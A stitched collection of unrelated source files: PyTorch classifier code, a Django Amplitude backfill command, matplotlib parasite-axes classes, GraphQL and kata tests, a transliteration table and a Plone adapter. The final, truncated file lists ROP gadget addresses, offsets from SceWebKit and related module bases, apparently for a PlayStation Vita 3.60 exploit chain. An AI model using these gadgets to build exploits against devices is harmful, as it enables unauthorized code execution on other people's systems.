        max_logits = torch.max(logits, dim=-1)
        min_logits = torch.min(logits, dim=-1)
        # Bug fix: uint8 masks for torch.where are deprecated/rejected by
        # modern PyTorch — build a boolean ground-truth mask instead.
        index = torch.zeros_like(max_logits[0], dtype=torch.bool)
        index.scatter_(1, labels.data.view(-1, 1), True)
        output = torch.where(index, min_logits[0], max_logits[0])
        # output = torch.mean(logits, dim=-1)
        adv_loss = F.cross_entropy(output, labels)
        return adv_loss

    def on_epoch(self):
        """Recompute per-class centroids from the feature bank (K-means when
        there are enough samples), rebuild the flat centroid matrix, and
        reset the bank."""
        for cla, features in enumerate(self.feature_bank):
            # fixme: if we use distributed training, the features would be stored on different devices
            assert len(features) > 0
            features = np.asarray(features)
            if features.shape[0] < self.num_centroids:
                # Too few samples to cluster: every centroid is the class mean.
                mean_feat = torch.mean(torch.tensor(features), dim=0)
                for i in range(self.num_centroids):
                    self.centroids[cla][i] = mean_feat
            else:
                kmeans = KMeans(n_clusters=self.num_centroids, random_state=0).fit(features)
                for i in range(self.num_centroids):
                    feat_tensor = torch.tensor(features[kmeans.labels_ == i])
                    self.centroids[cla][i] = torch.mean(feat_tensor, dim=0)
        self.centroids_classifier = self.centroids.view(self.num_classes*self.num_centroids, -1).cuda()
        # update classifier weight with centroids
        # gamma = 0.1
        # update_classifier = torch.nn.Parameter(self.centroids.mean(dim=1).clone().detach(), requires_grad=True).cuda()
        # self.fc.weight = (self.fc.weight + gamma * self.centroids.mean(dim=1).clone().detach().cuda()) / (1 + gamma)
        self.feature_bank = [[] for _ in range(self.num_classes)]
        print('>>> update centroids by feature back')
        return

    def update_feature_bank(self, inputs, labels):
        """Append each (detached, CPU) feature vector to its class's bank."""
        for feature, label in zip(inputs, labels):
            self.feature_bank[label].append(feature.clone().detach().cpu().numpy())
        # for i in range(self.num_classes):
        #     print(len(self.feature_bank[i]), end=' ')
        # print()

    def loss(self, logits, labels):
        """Standard cross-entropy on the linear head's logits."""
        # todo: more compact
        loss = F.cross_entropy(logits, labels)
        return loss
# Smoke test for the classifier heads on toy data.
# NOTE(review): requires a CUDA device — both classes call .cuda() internally.
if __name__ == '__main__':
    num_classes = 3
    samples_per_cls = [4,6,8]
    in_dim = 5
    batch_size = 6
    data = torch.randn([batch_size, in_dim, 14, 14])
    labels = torch.tensor([0,1,1,2,2,2], dtype=torch.int64)
    bn = BN_Classifier(num_classes, in_dim, samples_per_cls, bn_per_cls=True)
    bn(data, labels, 'CLEAN')

    num_centroids = 2
    mc = MC_Classifier(num_classes, in_dim, samples_per_cls, num_centroids)
    # Fill the feature bank so on_epoch() has something to cluster.
    for i, spc in enumerate(samples_per_cls):
        for _ in range(spc):
            mc.feature_bank[i].append(torch.randn(in_dim).numpy())
    mc.on_epoch()
    # mc.centroids = torch.randn(num_classes, num_centroids, in_dim)
    feat_inputs = torch.randn(batch_size, in_dim)
    labels = torch.tensor([0,1,1,2,2,2], dtype=torch.int64)
    mc.adv_loss(feat_inputs, labels)
|
11520865
|
import requests
import json
from django.core.management.base import BaseCommand
from user.models import User
from researchhub.settings import AMPLITUDE_API_KEY
API_URL = 'https://api.amplitude.com/2/httpapi'
class Command(BaseCommand):
    """Backfill Amplitude user properties for every user, in batches of 1000
    events per HTTP request."""

    def get_user_props(self, user, user_email):
        # Makes one less db call if user email is passed in
        # (user_email is accepted for call-site symmetry; the properties
        # below only need the user row itself).
        user_properties = {
            'is_suspended': user.is_suspended,
            'probable_spammer': user.probable_spammer
        }
        return user_properties

    def forward_amp_event(self, events):
        """POST one batch of events to Amplitude's HTTP API and log the result."""
        event_data = {
            'api_key': AMPLITUDE_API_KEY,
            'events': events
        }
        data = json.dumps(event_data)
        headers = {
            'Content-Type': 'application/json',
            'Accept': '*/*'
        }
        request = requests.post(
            API_URL,
            data=data,
            headers=headers
        )
        # Parse the body once (the old code parsed it twice on errors).
        res = request.json()
        if request.status_code != 200:
            print(res)
        print(res)

    def update_users(self, users):
        """Build an `update_user` event per user and ship them in batches.

        Bug fix: the previous version flushed *before* appending the current
        user's event, so the final user's event was never sent. Append first,
        flush when the batch is full, and flush the remainder after the loop.
        """
        print('Users')
        count = users.count()
        events = []
        for i, user in enumerate(users.iterator()):
            print(f'{i}/{count}')
            user_email = user.email
            user_properties = self.get_user_props(user, user_email)
            user_id = f'{user_email}_{user.id}'
            if len(user_id) < 5:
                # Pad short ids — Amplitude rejects user ids under 5 characters.
                user_id += '_____'
            hit = {
                'user_id': user_id,
                'event_type': 'update_user',
                'user_properties': user_properties,
            }
            events.append(hit)
            if len(events) >= 1000:
                self.forward_amp_event(events)
                events = []
        if events:
            self.forward_amp_event(events)

    def handle(self, *args, **options):
        user = User.objects
        self.update_users(user)
|
11520893
|
import functools
from matplotlib import artist as martist, cbook, transforms as mtransforms
from matplotlib.axes import subplot_class_factory
from matplotlib.transforms import Bbox
from .mpl_axes import Axes
import numpy as np
class ParasiteAxesBase:
    """Mix-in for axes that live inside a host axes: same figure and position
    as the host, no frame of their own, and pick events forwarded by the host."""

    def get_images_artists(self):
        # Split visible children into images vs. other artists so the host can
        # splice them into its own draw lists (see HostAxesBase.draw).
        artists = {a for a in self.get_children() if a.get_visible()}
        images = {a for a in self.images if a.get_visible()}
        return list(images), list(artists - images)

    def __init__(self, parent_axes, **kwargs):
        self._parent_axes = parent_axes
        kwargs["frameon"] = False  # the host draws the frame
        super().__init__(parent_axes.figure, parent_axes._position, **kwargs)

    def cla(self):
        super().cla()
        martist.setp(self.get_children(), visible=False)
        # Share the host's line-property cycler so colors keep advancing.
        self._get_lines = self._parent_axes._get_lines

        # In mpl's Axes, zorders of x- and y-axis are originally set
        # within Axes.draw().
        if self._axisbelow:
            self.xaxis.set_zorder(0.5)
            self.yaxis.set_zorder(0.5)
        else:
            self.xaxis.set_zorder(2.5)
            self.yaxis.set_zorder(2.5)

    def pick(self, mouseevent):
        # This most likely goes to Artist.pick (depending on axes_class given
        # to the factory), which only handles pick events registered on the
        # axes associated with each child:
        super().pick(mouseevent)
        # But parasite axes are additionally given pick events from their host
        # axes (cf. HostAxesBase.pick), which we handle here:
        for a in self.get_children():
            if (hasattr(mouseevent.inaxes, "parasites")
                    and self in mouseevent.inaxes.parasites):
                a.pick(mouseevent)
@functools.lru_cache(None)  # one generated class per axes_class
def parasite_axes_class_factory(axes_class=None):
    """Return a class mixing ParasiteAxesBase into *axes_class*."""
    if axes_class is None:
        cbook.warn_deprecated(
            "3.3", message="Support for passing None to "
            "parasite_axes_class_factory is deprecated since %(since)s and "
            "will be removed %(removal)s; explicitly pass the default Axes "
            "class instead.")
        axes_class = Axes
    return type("%sParasite" % axes_class.__name__,
                (ParasiteAxesBase, axes_class), {})


# Default parasite axes class, built on this package's Axes.
ParasiteAxes = parasite_axes_class_factory(Axes)
class ParasiteAxesAuxTransBase:
    """Parasite-axes mix-in whose data coordinates go through an auxiliary
    transform (``transAux``) before the host's data transform."""

    def __init__(self, parent_axes, aux_transform, viewlim_mode=None,
                 **kwargs):
        self.transAux = aux_transform
        self.set_viewlim_mode(viewlim_mode)
        super().__init__(parent_axes, **kwargs)

    def _set_lim_and_transforms(self):
        # Chain the auxiliary transform in front of the host's data transform.
        self.transAxes = self._parent_axes.transAxes
        self.transData = \
            self.transAux + \
            self._parent_axes.transData
        self._xaxis_transform = mtransforms.blended_transform_factory(
            self.transData, self.transAxes)
        self._yaxis_transform = mtransforms.blended_transform_factory(
            self.transAxes, self.transData)

    def set_viewlim_mode(self, mode):
        """Set how view limits follow the host: None (don't), "equal", or
        "transform" (host limits mapped through transAux's inverse)."""
        cbook._check_in_list([None, "equal", "transform"], mode=mode)
        self._viewlim_mode = mode

    def get_viewlim_mode(self):
        return self._viewlim_mode

    def update_viewlim(self):
        """Sync this axes' view limits from the host per the viewlim mode."""
        viewlim = self._parent_axes.viewLim.frozen()
        mode = self.get_viewlim_mode()
        if mode is None:
            pass
        elif mode == "equal":
            self.axes.viewLim.set(viewlim)
        elif mode == "transform":
            self.axes.viewLim.set(
                viewlim.transformed(self.transAux.inverted()))
        else:
            # Unreachable if set_viewlim_mode validated; re-raise consistently.
            cbook._check_in_list([None, "equal", "transform"], mode=mode)

    def _pcolor(self, super_pcolor, *XYC, **kwargs):
        # Shared implementation for pcolor/pcolormesh: build a default grid
        # when only C is given, then (unless the caller supplied an explicit
        # transform) push the grid through transAux and draw in host data
        # coordinates.
        if len(XYC) == 1:
            C = XYC[0]
            ny, nx = C.shape

            gx = np.arange(-0.5, nx)
            gy = np.arange(-0.5, ny)

            X, Y = np.meshgrid(gx, gy)
        else:
            X, Y, C = XYC

        if "transform" in kwargs:
            mesh = super_pcolor(X, Y, C, **kwargs)
        else:
            orig_shape = X.shape
            xyt = np.column_stack([X.flat, Y.flat])
            wxy = self.transAux.transform(xyt)
            gx = wxy[:, 0].reshape(orig_shape)
            gy = wxy[:, 1].reshape(orig_shape)
            mesh = super_pcolor(gx, gy, C, **kwargs)
            mesh.set_transform(self._parent_axes.transData)

        return mesh

    def pcolormesh(self, *XYC, **kwargs):
        return self._pcolor(super().pcolormesh, *XYC, **kwargs)

    def pcolor(self, *XYC, **kwargs):
        return self._pcolor(super().pcolor, *XYC, **kwargs)

    def _contour(self, super_contour, *XYCL, **kwargs):
        # Same grid/transform handling as _pcolor, for contour/contourf.
        if len(XYCL) <= 2:
            C = XYCL[0]
            ny, nx = C.shape

            gx = np.arange(0., nx)
            gy = np.arange(0., ny)

            X, Y = np.meshgrid(gx, gy)
            CL = XYCL
        else:
            X, Y = XYCL[:2]
            CL = XYCL[2:]

        if "transform" in kwargs:
            cont = super_contour(X, Y, *CL, **kwargs)
        else:
            orig_shape = X.shape
            xyt = np.column_stack([X.flat, Y.flat])
            wxy = self.transAux.transform(xyt)
            gx = wxy[:, 0].reshape(orig_shape)
            gy = wxy[:, 1].reshape(orig_shape)
            cont = super_contour(gx, gy, *CL, **kwargs)
            for c in cont.collections:
                c.set_transform(self._parent_axes.transData)

        return cont

    def contour(self, *XYCL, **kwargs):
        return self._contour(super().contour, *XYCL, **kwargs)

    def contourf(self, *XYCL, **kwargs):
        return self._contour(super().contourf, *XYCL, **kwargs)

    def apply_aspect(self, position=None):
        # Refresh view limits from the host before the aspect computation.
        self.update_viewlim()
        super().apply_aspect()
@functools.lru_cache(None)  # one generated class per axes_class
def parasite_axes_auxtrans_class_factory(axes_class=None):
    """Return a class mixing ParasiteAxesAuxTransBase into a parasite class
    derived from *axes_class* (which may itself already be a parasite class)."""
    if axes_class is None:
        cbook.warn_deprecated(
            "3.3", message="Support for passing None to "
            "parasite_axes_auxtrans_class_factory is deprecated since "
            "%(since)s and will be removed %(removal)s; explicitly pass the "
            "default ParasiteAxes class instead.")
        parasite_axes_class = ParasiteAxes
    elif not issubclass(axes_class, ParasiteAxesBase):
        parasite_axes_class = parasite_axes_class_factory(axes_class)
    else:
        parasite_axes_class = axes_class
    return type("%sParasiteAuxTrans" % parasite_axes_class.__name__,
                (ParasiteAxesAuxTransBase, parasite_axes_class),
                {'name': 'parasite_axes'})


# Default aux-transform parasite axes class.
ParasiteAxesAuxTrans = parasite_axes_auxtrans_class_factory(ParasiteAxes)
class HostAxesBase:
    """Mix-in for axes that can host parasite axes: tracks them, forwards
    drawing/clearing/picking, and provides twinx/twiny/twin constructors."""

    def __init__(self, *args, **kwargs):
        self.parasites = []
        super().__init__(*args, **kwargs)

    def get_aux_axes(self, tr, viewlim_mode="equal", axes_class=ParasiteAxes):
        """Add and return a parasite axes using transform *tr*."""
        parasite_axes_class = parasite_axes_auxtrans_class_factory(axes_class)
        ax2 = parasite_axes_class(self, tr, viewlim_mode)
        # note that ax2.transData == tr + ax1.transData
        # Anything you draw in ax2 will match the ticks and grids of ax1.
        self.parasites.append(ax2)
        ax2._remove_method = self.parasites.remove
        return ax2

    def _get_legend_handles(self, legend_handler_map=None):
        # Merge the host's legend handles with those of every parasite.
        all_handles = super()._get_legend_handles()
        for ax in self.parasites:
            all_handles.extend(ax._get_legend_handles(legend_handler_map))
        return all_handles

    def draw(self, renderer):
        # Temporarily splice the parasites' artists/images into this axes'
        # draw lists so everything renders in one pass, then restore them.
        orig_artists = list(self.artists)
        orig_images = list(self.images)

        if hasattr(self, "get_axes_locator"):
            locator = self.get_axes_locator()
            if locator:
                pos = locator(self, renderer)
                self.set_position(pos, which="active")
                self.apply_aspect(pos)
            else:
                self.apply_aspect()
        else:
            self.apply_aspect()

        rect = self.get_position()
        for ax in self.parasites:
            ax.apply_aspect(rect)
            images, artists = ax.get_images_artists()
            self.images.extend(images)
            self.artists.extend(artists)

        super().draw(renderer)
        self.artists = orig_artists
        self.images = orig_images

    def cla(self):
        for ax in self.parasites:
            ax.cla()
        super().cla()

    def pick(self, mouseevent):
        super().pick(mouseevent)
        # Also pass pick events on to parasite axes and, in turn, their
        # children (cf. ParasiteAxesBase.pick)
        for a in self.parasites:
            a.pick(mouseevent)

    def twinx(self, axes_class=None):
        """
        Create a twin of Axes with a shared x-axis but independent y-axis.

        The y-axis of self will have ticks on the left and the returned axes
        will have ticks on the right.
        """
        if axes_class is None:
            axes_class = self._get_base_axes()

        parasite_axes_class = parasite_axes_class_factory(axes_class)

        ax2 = parasite_axes_class(self, sharex=self, frameon=False)
        self.parasites.append(ax2)
        ax2._remove_method = self._remove_twinx

        self.axis["right"].set_visible(False)

        ax2.axis["right"].set_visible(True)
        ax2.axis["left", "top", "bottom"].set_visible(False)

        return ax2

    def _remove_twinx(self, ax):
        # Restore the host's right spine when the twin is removed.
        self.parasites.remove(ax)
        self.axis["right"].set_visible(True)
        self.axis["right"].toggle(ticklabels=False, label=False)

    def twiny(self, axes_class=None):
        """
        Create a twin of Axes with a shared y-axis but independent x-axis.

        The x-axis of self will have ticks on the bottom and the returned axes
        will have ticks on the top.
        """
        if axes_class is None:
            axes_class = self._get_base_axes()

        parasite_axes_class = parasite_axes_class_factory(axes_class)

        ax2 = parasite_axes_class(self, sharey=self, frameon=False)
        self.parasites.append(ax2)
        ax2._remove_method = self._remove_twiny

        self.axis["top"].set_visible(False)

        ax2.axis["top"].set_visible(True)
        ax2.axis["left", "right", "bottom"].set_visible(False)

        return ax2

    def _remove_twiny(self, ax):
        # Restore the host's top spine when the twin is removed.
        self.parasites.remove(ax)
        self.axis["top"].set_visible(True)
        self.axis["top"].toggle(ticklabels=False, label=False)

    def twin(self, aux_trans=None, axes_class=None):
        """
        Create a twin of Axes with no shared axis.

        While self will have ticks on the left and bottom axis, the returned
        axes will have ticks on the top and right axis.
        """
        if axes_class is None:
            axes_class = self._get_base_axes()

        parasite_axes_auxtrans_class = \
            parasite_axes_auxtrans_class_factory(axes_class)

        if aux_trans is None:
            ax2 = parasite_axes_auxtrans_class(
                self, mtransforms.IdentityTransform(), viewlim_mode="equal")
        else:
            ax2 = parasite_axes_auxtrans_class(
                self, aux_trans, viewlim_mode="transform")
        self.parasites.append(ax2)
        # NOTE(review): this assignment is immediately overwritten by the
        # local _remove_method defined below — looks dead; confirm.
        ax2._remove_method = self.parasites.remove

        self.axis["top", "right"].set_visible(False)

        ax2.axis["top", "right"].set_visible(True)
        ax2.axis["left", "bottom"].set_visible(False)

        def _remove_method(h):
            self.parasites.remove(h)
            self.axis["top", "right"].set_visible(True)
            self.axis["top", "right"].toggle(ticklabels=False, label=False)
        ax2._remove_method = _remove_method

        return ax2

    def get_tightbbox(self, renderer, call_axes_locator=True,
                      bbox_extra_artists=None):
        # Union of this axes' tight bbox with every parasite's, ignoring
        # degenerate (zero-size) boxes.
        bbs = [
            *[ax.get_tightbbox(renderer, call_axes_locator=call_axes_locator)
              for ax in self.parasites],
            super().get_tightbbox(renderer,
                                  call_axes_locator=call_axes_locator,
                                  bbox_extra_artists=bbox_extra_artists)]
        return Bbox.union([b for b in bbs if b.width != 0 or b.height != 0])
@functools.lru_cache(None)  # one generated class per axes_class
def host_axes_class_factory(axes_class=None):
    """Return a class mixing HostAxesBase into *axes_class*."""
    if axes_class is None:
        cbook.warn_deprecated(
            "3.3", message="Support for passing None to host_axes_class is "
            # Bug fix: warn_deprecated's formatter supplies %(removal)s, not
            # %(removed)s (cf. the two sibling factories above) — the old key
            # would raise KeyError when the warning text is formatted.
            "deprecated since %(since)s and will be removed %(removal)s; "
            "explicitly pass the default Axes class instead.")
        axes_class = Axes

    def _get_base_axes(self):
        # Lets twinx/twiny/twin default to the originally wrapped class.
        return axes_class

    return type("%sHostAxes" % axes_class.__name__,
                (HostAxesBase, axes_class),
                {'_get_base_axes': _get_base_axes})
def host_subplot_class_factory(axes_class):
    """Return a subplot class whose axes can host parasite axes."""
    return subplot_class_factory(host_axes_class_factory(axes_class))


# Default host classes built on this package's Axes.
HostAxes = host_axes_class_factory(Axes)
SubplotHost = subplot_class_factory(HostAxes)
def host_axes(*args, axes_class=Axes, figure=None, **kwargs):
    """
    Create axes that can act as a hosts to parasitic axes.

    Parameters
    ----------
    figure : `matplotlib.figure.Figure`
        Figure to which the axes will be added. Defaults to the current figure
        `.pyplot.gcf()`.

    *args, **kwargs
        Will be passed on to the underlying ``Axes`` object creation.
    """
    import matplotlib.pyplot as plt
    if figure is None:
        figure = plt.gcf()
    ax = host_axes_class_factory(axes_class)(figure, *args, **kwargs)
    figure.add_axes(ax)
    plt.draw_if_interactive()
    return ax
def host_subplot(*args, axes_class=Axes, figure=None, **kwargs):
    """
    Create a subplot that can act as a host to parasitic axes.

    Parameters
    ----------
    figure : `matplotlib.figure.Figure`
        Figure to which the subplot will be added. Defaults to the current
        figure `.pyplot.gcf()`.

    *args, **kwargs
        Will be passed on to the underlying ``Axes`` object creation.
    """
    import matplotlib.pyplot as plt
    if figure is None:
        figure = plt.gcf()
    ax = host_subplot_class_factory(axes_class)(figure, *args, **kwargs)
    figure.add_subplot(ax)
    plt.draw_if_interactive()
    return ax
|
11520906
|
import pytest
from tartiflette import Resolver, create_engine
_SDL = """
type A {
b: String
c: String
}
type Query {
a: A
}
"""
@pytest.mark.asyncio
async def test_issue140():
    """Engine creation with `modules=` must load and register the resolvers
    declared in those modules."""
    # Local resolver returning literal values for A's fields...
    @Resolver("Query.a", schema_name="test_issue140")
    async def resolver_query_a(*args, **kwargs):
        return {"b": "mpm", "c": "ppp"}

    eng = await create_engine(
        _SDL,
        schema_name="test_issue140",
        modules=[
            "tests.functional.test_engine_modules",
            "tests.functional.test_engine_modules.non_init_resolver",
        ],
    )

    # ...but the field resolvers registered by the loaded modules win,
    # yielding "A.b"/"A.c" instead of the dict values above.
    assert await eng.execute("""query { a { b c } }""") == {
        "data": {"a": {"b": "A.b", "c": "A.c"}}
    }
@pytest.mark.asyncio
async def test_issue140_except():
    """An unimportable entry in `modules=` must surface as ImportError."""
    with pytest.raises(ImportError):
        await create_engine("""a""", modules=["unkn.nown.modules"])
|
11520936
|
# Transliteration table for one 256-code-point Unicode block: index == the low
# byte of the code point, value == an approximate pinyin/Latin reading (with a
# trailing space). '[?]' marks characters with no known transliteration.
data = (
    'Yu ',  # 0x00
    'Cui ',  # 0x01
    'Ya ',  # 0x02
    'Zhu ',  # 0x03
    'Cu ',  # 0x04
    'Dan ',  # 0x05
    'Shen ',  # 0x06
    'Zhung ',  # 0x07
    'Ji ',  # 0x08
    'Yu ',  # 0x09
    'Hou ',  # 0x0a
    'Feng ',  # 0x0b
    'La ',  # 0x0c
    'Yang ',  # 0x0d
    'Shen ',  # 0x0e
    'Tu ',  # 0x0f
    'Yu ',  # 0x10
    'Gua ',  # 0x11
    'Wen ',  # 0x12
    'Huan ',  # 0x13
    'Ku ',  # 0x14
    'Jia ',  # 0x15
    'Yin ',  # 0x16
    'Yi ',  # 0x17
    'Lu ',  # 0x18
    'Sao ',  # 0x19
    'Jue ',  # 0x1a
    'Chi ',  # 0x1b
    'Xi ',  # 0x1c
    'Guan ',  # 0x1d
    'Yi ',  # 0x1e
    'Wen ',  # 0x1f
    'Ji ',  # 0x20
    'Chuang ',  # 0x21
    'Ban ',  # 0x22
    'Lei ',  # 0x23
    'Liu ',  # 0x24
    'Chai ',  # 0x25
    'Shou ',  # 0x26
    'Nue ',  # 0x27
    'Dian ',  # 0x28
    'Da ',  # 0x29
    'Pie ',  # 0x2a
    'Tan ',  # 0x2b
    'Zhang ',  # 0x2c
    'Biao ',  # 0x2d
    'Shen ',  # 0x2e
    'Cu ',  # 0x2f
    'Luo ',  # 0x30
    'Yi ',  # 0x31
    'Zong ',  # 0x32
    'Chou ',  # 0x33
    'Zhang ',  # 0x34
    'Zhai ',  # 0x35
    'Sou ',  # 0x36
    'Suo ',  # 0x37
    'Que ',  # 0x38
    'Diao ',  # 0x39
    'Lou ',  # 0x3a
    'Lu ',  # 0x3b
    'Mo ',  # 0x3c
    'Jin ',  # 0x3d
    'Yin ',  # 0x3e
    'Ying ',  # 0x3f
    'Huang ',  # 0x40
    'Fu ',  # 0x41
    'Liao ',  # 0x42
    'Long ',  # 0x43
    'Qiao ',  # 0x44
    'Liu ',  # 0x45
    'Lao ',  # 0x46
    'Xian ',  # 0x47
    'Fei ',  # 0x48
    'Dan ',  # 0x49
    'Yin ',  # 0x4a
    'He ',  # 0x4b
    'Yan ',  # 0x4c
    'Ban ',  # 0x4d
    'Xian ',  # 0x4e
    'Guan ',  # 0x4f
    'Guai ',  # 0x50
    'Nong ',  # 0x51
    'Yu ',  # 0x52
    'Wei ',  # 0x53
    'Yi ',  # 0x54
    'Yong ',  # 0x55
    'Pi ',  # 0x56
    'Lei ',  # 0x57
    'Li ',  # 0x58
    'Shu ',  # 0x59
    'Dan ',  # 0x5a
    'Lin ',  # 0x5b
    'Dian ',  # 0x5c
    'Lin ',  # 0x5d
    'Lai ',  # 0x5e
    'Pie ',  # 0x5f
    'Ji ',  # 0x60
    'Chi ',  # 0x61
    'Yang ',  # 0x62
    'Xian ',  # 0x63
    'Jie ',  # 0x64
    'Zheng ',  # 0x65
    '[?] ',  # 0x66
    'Li ',  # 0x67
    'Huo ',  # 0x68
    'Lai ',  # 0x69
    'Shaku ',  # 0x6a
    'Dian ',  # 0x6b
    'Xian ',  # 0x6c
    'Ying ',  # 0x6d
    'Yin ',  # 0x6e
    'Qu ',  # 0x6f
    'Yong ',  # 0x70
    'Tan ',  # 0x71
    'Dian ',  # 0x72
    'Luo ',  # 0x73
    'Luan ',  # 0x74
    'Luan ',  # 0x75
    'Bo ',  # 0x76
    '[?] ',  # 0x77
    'Gui ',  # 0x78
    'Po ',  # 0x79
    'Fa ',  # 0x7a
    'Deng ',  # 0x7b
    'Fa ',  # 0x7c
    'Bai ',  # 0x7d
    'Bai ',  # 0x7e
    'Qie ',  # 0x7f
    'Bi ',  # 0x80
    'Zao ',  # 0x81
    'Zao ',  # 0x82
    'Mao ',  # 0x83
    'De ',  # 0x84
    'Pa ',  # 0x85
    'Jie ',  # 0x86
    'Huang ',  # 0x87
    'Gui ',  # 0x88
    'Ci ',  # 0x89
    'Ling ',  # 0x8a
    'Gao ',  # 0x8b
    'Mo ',  # 0x8c
    'Ji ',  # 0x8d
    'Jiao ',  # 0x8e
    'Peng ',  # 0x8f
    'Gao ',  # 0x90
    'Ai ',  # 0x91
    'E ',  # 0x92
    'Hao ',  # 0x93
    'Han ',  # 0x94
    'Bi ',  # 0x95
    'Wan ',  # 0x96
    'Chou ',  # 0x97
    'Qian ',  # 0x98
    'Xi ',  # 0x99
    'Ai ',  # 0x9a
    'Jiong ',  # 0x9b
    'Hao ',  # 0x9c
    'Huang ',  # 0x9d
    'Hao ',  # 0x9e
    'Ze ',  # 0x9f
    'Cui ',  # 0xa0
    'Hao ',  # 0xa1
    'Xiao ',  # 0xa2
    'Ye ',  # 0xa3
    'Po ',  # 0xa4
    'Hao ',  # 0xa5
    'Jiao ',  # 0xa6
    'Ai ',  # 0xa7
    'Xing ',  # 0xa8
    'Huang ',  # 0xa9
    'Li ',  # 0xaa
    'Piao ',  # 0xab
    'He ',  # 0xac
    'Jiao ',  # 0xad
    'Pi ',  # 0xae
    'Gan ',  # 0xaf
    'Pao ',  # 0xb0
    'Zhou ',  # 0xb1
    'Jun ',  # 0xb2
    'Qiu ',  # 0xb3
    'Cun ',  # 0xb4
    'Que ',  # 0xb5
    'Zha ',  # 0xb6
    'Gu ',  # 0xb7
    'Jun ',  # 0xb8
    'Jun ',  # 0xb9
    'Zhou ',  # 0xba
    'Zha ',  # 0xbb
    'Gu ',  # 0xbc
    'Zhan ',  # 0xbd
    'Du ',  # 0xbe
    'Min ',  # 0xbf
    'Qi ',  # 0xc0
    'Ying ',  # 0xc1
    'Yu ',  # 0xc2
    'Bei ',  # 0xc3
    'Zhao ',  # 0xc4
    'Zhong ',  # 0xc5
    'Pen ',  # 0xc6
    'He ',  # 0xc7
    'Ying ',  # 0xc8
    'He ',  # 0xc9
    'Yi ',  # 0xca
    'Bo ',  # 0xcb
    'Wan ',  # 0xcc
    'He ',  # 0xcd
    'Ang ',  # 0xce
    'Zhan ',  # 0xcf
    'Yan ',  # 0xd0
    'Jian ',  # 0xd1
    'He ',  # 0xd2
    'Yu ',  # 0xd3
    'Kui ',  # 0xd4
    'Fan ',  # 0xd5
    'Gai ',  # 0xd6
    'Dao ',  # 0xd7
    'Pan ',  # 0xd8
    'Fu ',  # 0xd9
    'Qiu ',  # 0xda
    'Sheng ',  # 0xdb
    'Dao ',  # 0xdc
    'Lu ',  # 0xdd
    'Zhan ',  # 0xde
    'Meng ',  # 0xdf
    'Li ',  # 0xe0
    'Jin ',  # 0xe1
    'Xu ',  # 0xe2
    'Jian ',  # 0xe3
    'Pan ',  # 0xe4
    'Guan ',  # 0xe5
    'An ',  # 0xe6
    'Lu ',  # 0xe7
    'Shu ',  # 0xe8
    'Zhou ',  # 0xe9
    'Dang ',  # 0xea
    'An ',  # 0xeb
    'Gu ',  # 0xec
    'Li ',  # 0xed
    'Mu ',  # 0xee
    'Cheng ',  # 0xef
    'Gan ',  # 0xf0
    'Xu ',  # 0xf1
    'Mang ',  # 0xf2
    'Mang ',  # 0xf3
    'Zhi ',  # 0xf4
    'Qi ',  # 0xf5
    'Ruan ',  # 0xf6
    'Tian ',  # 0xf7
    'Xiang ',  # 0xf8
    'Dun ',  # 0xf9
    'Xin ',  # 0xfa
    'Xi ',  # 0xfb
    'Pan ',  # 0xfc
    'Feng ',  # 0xfd
    'Dun ',  # 0xfe
    'Min ',  # 0xff
)
|
11520940
|
import unittest
from katas.beta.count_inversions import count_inversion
class CountInversionsTestCase(unittest.TestCase):
    """Tests for count_inversion: the number of pairs (i, j) with i < j and
    sequence[i] > sequence[j]."""

    def test_equal_1(self):
        self.assertEqual(count_inversion((1, 2, 5, 3, 4, 7, 6)), 3)

    def test_equal_2(self):
        self.assertEqual(count_inversion((0, 1, 2, 3)), 0)

    def test_equal_3(self):
        self.assertEqual(count_inversion((1, 2, 3)), 0)

    def test_equal_4(self):
        self.assertEqual(count_inversion((1, 3, 2)), 1)

    def test_equal_5(self):
        self.assertEqual(count_inversion((3, 6, 2, 7, 3)), 4)

    def test_equal_6(self):
        # Empty input has no pairs at all.
        self.assertEqual(count_inversion(()), 0)

    def test_equal_7(self):
        # Equal elements do not count as inversions.
        self.assertEqual(count_inversion((3, 3, 3)), 0)
|
11520942
|
from create_grids import create_grids
from run_model import run_model
from plot_testcase import plot_testcase
#-------------------------------------------------------------------------------
def run_ridging_island_testcase():
    """Run the full ridging-island test case: grid creation, model run, plots."""
    for stage in (create_grids, run_model, plot_testcase):
        stage()

#-------------------------------------------------------------------------------

if __name__ == "__main__":

    run_ridging_island_testcase()
|
11520972
|
from plone.app.layout.icons.icons import CatalogBrainContentIcon
class FontAwesomeIconReplacer(CatalogBrainContentIcon):
    """ Custom IContentIcon adapter. This is used by @@ploneview to
        determine which icons to render.

        We want to prevent the rendering of icons, so that FontAwesome fonts
        will render instead.

        For example, in folder listing. See
        Products.CMFPlone.skins.plone_content.folder_listing.pt
    """
    @property
    def url(self):
        # Returning None suppresses the <img> icon so CSS-based FontAwesome
        # glyphs can take its place.
        return None
|
11520980
|
from collections import OrderedDict
from rop import Rop, Ret, Load
from relocatable import SceWebKit_base, SceLibKernel_base, SceLibc_base, SceLibHttp_base, SceNet_base, data_base
from util import p32, u32
class Gadgets360:
    """ROP gadget addresses for firmware 3.60, expressed as fixed offsets from
    the relocatable module bases (SceWebKit/SceLibKernel). Names encode the
    instruction sequence at each address."""
    ldm_r1_stuff = SceWebKit_base + 0x54c8  # 54c8: e891a916 ldm r1, {r1, r2, r4, r8, fp, sp, pc}
    blx_r4_pop_r4_r5_r6_pc = SceWebKit_base + 0xbfb91
    pop_r0_r1_r2_r3_r4_r5_pc = SceWebKit_base + 0x8dd9b5
    pop_r1_r2_r3_r4_pc = SceWebKit_base + 0x860637
    ldr_r0_r0_pop_r4_pc = SceWebKit_base + 0x695b1
    pop_r2_pc = SceWebKit_base + 0x884b85
    pop_r0_pc = SceWebKit_base + 0x927215
    ldr_r1_r0_mov_r0_r1_pop_r4_pc = SceWebKit_base + 0x698fb
    blx_r4_pop_r4_pc = SceWebKit_base + 0xfcdbb
    pop_r0_r1_pc = SceWebKit_base + 0x8e7445
    str_r0_r1_pop_r4 = SceWebKit_base + 0x15591b
    pop_r1_pc = SceWebKit_base + 0x877235
    pop_r4_pc = SceWebKit_base + 0x123
    adds_r0_r1 = SceWebKit_base + 0x17a383  # adds r0, r1, r0; bx lr
    pop_r5_r6_r7_r8_sb_pc = SceWebKit_base + 0xeb4d5
    pop_pc = SceWebKit_base + 0xc048b
    ldr_r1_r1_blx_sb = SceWebKit_base + 0x612351
    ldrb_r0_r0_pop_r4 = SceWebKit_base + 0x12b5c7
    lsls_r0_2_pop_r4 = SceWebKit_base + 0x4523cd  # lsls r0, r0, #2 ; pop {r4, pc}
